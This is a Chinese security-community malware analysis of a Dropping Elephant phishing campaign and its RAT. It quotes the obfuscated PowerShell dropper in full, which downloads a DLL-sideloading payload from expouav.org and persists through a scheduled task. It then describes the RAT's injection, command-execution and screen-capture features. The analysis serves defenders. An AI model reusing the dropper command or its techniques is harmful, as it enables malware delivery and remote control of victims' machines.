大数跨境
0
0

Dropping-elephant rat恶意样本分析

Dropping-elephant rat恶意样本分析 看雪学苑
2025-09-13
0
导读:看雪论坛作者ID:之健

初始入侵lnk文件钓鱼

威胁行为者通过发送带有恶意lnk文件的钓鱼邮件来发起攻击。lnk文件伪装为pdf文件诱导受害者点击,当受害者点击后会通过Pester.bat执行恶意的power shell命令。

命令如下:


"C:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\bin\Pester.bat" ;
powershell s''l''eep 1;
$ProgressPreference ='SilentlyContinue';
$a='https:';
$b='C:\Users\';
$c='C:\Windows\';
wg''et $a//expouav.org/download/fetch/list3/12717/view/0d5a0411-0a85-42cf-928c-dd9218019f3b -OutFile $b\Public\Unmanned_Vehicle_Systems_Conference_2025_In_Istanbul.pdf;
s''ap''s "$b\Public\Unmanned_Vehicle_Systems_Conference_2025_In_Istanbul.pdf";
wg''et $a//expouav.org/download/fetch/list7/40275/view/e49c7ae0-f3d1-4073-83bb-b4ecba929fec -Outfile $c\Tasks\lama;
r''e''-Path "$c\Tasks\lama" -NewName "$c\Tasks\vlc.pepxpe";
r''e''-Path "$c\Tasks\vlc.pepxpe" -NewName ((Split-Path "$c\Tasks\vlc.pepxpe" -Leaf) -replace "p", "");
wg''et $a//expouav.org/download/fetch/list5/19577/view/b5aaa6f0-6259-4ccb-b31a-d21e40c2eeff -Outfile $c\Tasks\lake;
r''e''-Path "$c\Tasks\lake" -NewName "$c\Tasks\libvlc.pdplpl";
r''e''-Path "$c\Tasks\libvlc.pdplpl" -NewName ((Split-Path "$c\Tasks\libvlc.pdplpl" -Leaf) -replace "p", "");
wg''et $a//expouav.org/download/fetch/list6/41568/view/701bbff4-8fcb-4e9c-8577-00aed06d8443 -Outfile $c\Tasks\dalai;
r''e''-Path "$c\Tasks\dalai" -NewName "$c\Tasks\Winver.pepxpe";
r''e''-Path "$c\Tasks\Winver.pepxpe" -NewName ((Split-Path "$c\Tasks\Winver.pepxpe" -Leaf) -replace "p", "");
c''p''i "$b\Public\Unmanned_Vehicle_Systems_Conference_2025_In_Istanbul.pdf" -destination .;
wg''et $a//expouav.org/download/fetch/list8/20041/view/c6795195-6e84-4720-9420-e03da09b2187 -OutFile $c\Tasks\vlc.log;
$d="$c\Tasks\Winver";
s''ap''s $d -a "/Create", '/sc''minute''/tn''NewErrorReport''/tr', "$c\Tasks\vlc", '/f';
e''r''a''s''*d?.?n?


powershell 脚本通过在expouav.org下载多个文件。

具体下载的文件信息如下
1、欺骗显示的pdf正常文件Unmanned_Vehicle_Systems_Conference_2025_In_Istanbul.pdf
2、合法的播放器文件vlc.exe
3、恶意的dll库libvlc.dll
4、合法的Microsoft任务计划程序Winver.exe
5、加密的shellcode文件vlc.log
通过下载的Winver 文件创建计划任务执行vlc文件。然后通过合法的vlc.exe加载恶意的libvlc.dll库,解密执行shellcode。
由于未下载到shellcode文件,以下对shellcode释放的最终负载RAT做分析。

RAT逆向分析

隐藏窗口
图片描述

唯一实例

创建互斥体ghjghkj

图片描述


获取用户信息发送注册包

部分信息如下

用户名

图片描述

计算机名

图片描述

本地IP与出口IP地址

图片描述

图片描述

创建线程通过HTTP发送注册包

图片描述

图片描述

数据发送前经过base64编码与aes加密

base64

图片描述

aes

图片描述

命令执行循环

发送cuud 包获取命令

图片描述

命令3Up3:上传文件,可执行

图片描述

命令3gjdfghj6:执行CMD命令

图片描述


命令3ngjfng5:下载文件

图片描述

命令3CRT3:远程线程注入执行

图片描述

命令3APC3:APC注入执行

图片描述

命令3SC3:屏幕监控

图片描述


参考链接

https://arcticwolf.com/resources/blog/dropping-elephant-apt-group-targets-turkish-defense-industry





看雪ID:之健

https://bbs.kanxue.com/user-home-912006.htm

*本文为看雪论坛优秀文章,由 之健 原创,转载请注明来自看雪社区

1.25折早鸟票开售!9月23日截止

# 往期推荐

CRC校验原理及绕过

Win11下利用PsSyscallProviderDispatch进行进程级SSDT HOOK

初识白盒AES-含具体实操案例

安卓逆向之 Autojs 加密 JS 文件提取和解密

APP设备风控分析及绕过

图片

球分享

球点赞

球在看


点击阅读原文查看更多

【声明】内容源于网络
0
0
看雪学苑
致力于移动与安全研究的开发者社区,看雪学院(kanxue.com)官方微信公众帐号。
内容 6594
粉丝 0
看雪学苑 致力于移动与安全研究的开发者社区,看雪学院(kanxue.com)官方微信公众帐号。
总阅读398
粉丝0
内容6.6k